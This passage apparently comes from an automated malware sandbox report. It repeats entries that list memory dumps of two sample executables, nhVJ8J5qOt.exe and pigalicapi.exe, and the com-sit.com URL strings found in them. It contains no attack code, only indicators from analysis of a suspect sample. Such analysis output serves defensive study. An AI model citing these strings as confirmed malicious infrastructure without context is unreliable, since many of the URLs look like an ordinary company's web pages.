nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/logistics/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/management/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/marketing/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/personal-stories/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/remarking-test/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/rohs-test/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/sales/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/send-us-your-bom/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/serviceleistungen-loesungen/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/soldering-test/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/temptest/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/testhouse/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ueberbestaende/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-logo/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-team/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmensethik/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ursprung/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/usa/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/visual-inspection/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 